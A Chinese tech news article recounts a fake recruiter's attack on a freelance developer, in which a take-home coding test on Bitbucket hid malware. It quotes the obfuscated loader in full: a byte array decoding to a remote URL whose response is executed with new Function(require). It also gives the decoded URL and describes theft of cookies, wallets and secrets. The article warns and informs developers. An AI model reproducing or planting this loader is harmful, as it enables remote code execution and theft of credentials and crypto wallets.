仅差30秒！8年开发者险遭“面试劫”：测试代码暗中「藏毒」，回车一下就可能“倾家荡产”

AI科技 2025年10月20日 21:26 0 aa

整理 | 郑丽媛

出品 | CSDN（ID：CSDNnews）

“再晚 30 秒，我的加密钱包、项目源码和所有个人数据就全没了。”

回顾那场精心设计的“面试骗局”，拥有 8 年自由开发经验的 David Dodda 至今仍心有余悸。

近日，David Dodda 在技术社区公开了自己遭遇的新型开发者定向攻击：骗子伪装成一家区块链公司高管，邀请他进行远程面试，并以“编程测试”为饵植入恶意代码——若不是他在最后一刻突然警觉，后果将不堪设想。

从“正规邀约”到“代码测试”：骗局的完美铺垫

故事始于 LinkedIn 上一条看似普通的工作消息。

上周，David Dodda 的 LinkedIn 账号收到了一条来自“Symfa 公司首席区块链官 Mykola Yanchii”的私信。对方介绍称，他们公司正在开发一款名为 BestCity 的房地产工作流程转型平台，目前正在招募兼职开发者，工作时间灵活，并与 David Dodda 的技术栈很匹配。

出于职业习惯，David 首先核查了 Mykola Yanchii 的身份，LinkedIn 上的对方履历非常“官方”：不仅有完整的职业履历，还标注了 Symfa 首席区块链官的头衔，账号拥有 1000+ 真实好友连接，连日常发的动态都带有那种“创业者式励志语录”的味道……

总之就是：非常标准的、你在社交平台上看了十遍都不会起疑心的风格。

紧接着，David Dodda 又点开了 Symfa 公司的 LinkedIn 主页，同样无懈可击：不仅有专业的品牌视觉设计，还展示了多名员工信息、公司业务介绍，甚至发布过多条“用区块链改造房地产行业”的项目动态——看起来，完全是一家正常运营的科技企业。

对 David Dodda 这样的自由开发者来说，这类邀约并不少见——发件人礼貌、表达专业，没有提出不合理要求，仅约定通过线上面试进一步沟通，这一切都强化了“可信度”。

“我做自由职业 8 年了，做过 Web 应用、各种项目、代码审查也不少。我自认为安全意识很强——至少我是这么认为的。而这次看上去也很靠谱，所以我同意了电话面试。”

随即，Mykola Yanchi 以“提前评估技术能力、节省沟通时间”为由，发来了一个 Bitbucket 代码库链接，要求 David Dodda 在 30 分钟内完成 React/Node 项目的简单优化——这是技术面试中最常规的 “Take-Home 测试”，几乎所有开发者都经历过。

David Dodda 点开代码库后发现：代码结构清晰，不仅有详细的 README 文档，还附带了符合企业风格的宣传图，甚至标注了需要优化的功能点，看起来就是一份很标准的面试测试题。

30 分钟的 “时间陷阱”：差点跳过的安全红线

然而，一个关键细节为后续的“危险操作”埋下伏笔——当时，距离约定的电话面试时间仅剩 30 分钟，这对 David Dodda 而言时间有些紧张。

“正常情况下，我会先把代码放到 Docker 容器里隔离运行，确认没有问题再开始优化。”他坦言，多年的开发经验让他养成了“沙箱运行未知代码”的习惯，但这次的紧迫感打乱了节奏。

为了赶在面试前完成测试，David Dodda 直接在本地环境打开了代码库，快速排查出几处明显的语法 Bug，补充了缺失的 docker-compose 文件，还优化了部分冗余代码，整个过程与常规测试无异。

正当他准备输入“npm start”运行项目、向面试官展示成果时，多年的安全直觉突然 “警报响起”——“哪怕再急，运行未知代码前至少要扫一遍关键文件”。

抱着 “多花 1 分钟检查” 的想法，David Dodda 将代码片段复制到了 Cursor AI 助手中，并发送了一条简单的查询指令：

"在我运行这个程序之前，你能看看这个代码库中是否有任何可疑代码吗？比如读取不该读取的文件、访问加密钱包等"。

没想到，AI 给出的反馈让他瞬间冷汗直流——在 server/controllers/userController.js 文件中，隐藏着一段高度混淆的恶意代码：

//Get Cookie  (async  => {      const byteArray = [          104, 116, 116, 112, 115, 58, 47, 47, 97, 112, 105, 46, 110, 112, 111, 105,          110, 116, 46, 105, 111, 47, 50, 99, 52, 53, 56, 54, 49, 50, 51, 57, 99, 51,          98, 50, 48, 51, 49, 102, 98, 57      ];      const uint8Array = new Uint8Array(byteArray);      const decoder = new TextDecoder('utf-8');      axios.get(decoder.decode(uint8Array))          .then(response => {   new Function("require", response.data.model)(require);          })          .catch(error => { });  });

这段代码采用字节数组隐藏了一个远程URL，通过axios.get获取恶意负载，并使用JavaScript的Function构造函数执行——最重要的是，这段代码巧妙地嵌在管理功能之间，一旦访问到相应的 admin 路由，它就能以完整的服务器权限随时执行。

David Dodda 立即解码了那个字节数组：https://api.npoint.io/2c458612399c3b2031fb9。不出所料，这个 URL 指向的就是一个恶意 payload：一旦运行，将自动读取本地文件系统、抓取浏览器 Cookie、访问加密钱包客户端，甚至获取环境变量中的数据库密码与生产环境密钥——相当于向攻击者敞开了“数字家门”。

更可怕的是，当 David Dodda 在 24 小时后再次尝试访问该 URL 时，链接已完全失效——也就是说，骗子为了避免攻击痕迹被追踪，早已设置了“自动销毁”机制。

这一切都显得那么专业，显然不是随便哪个钓鱼邮件能做到的。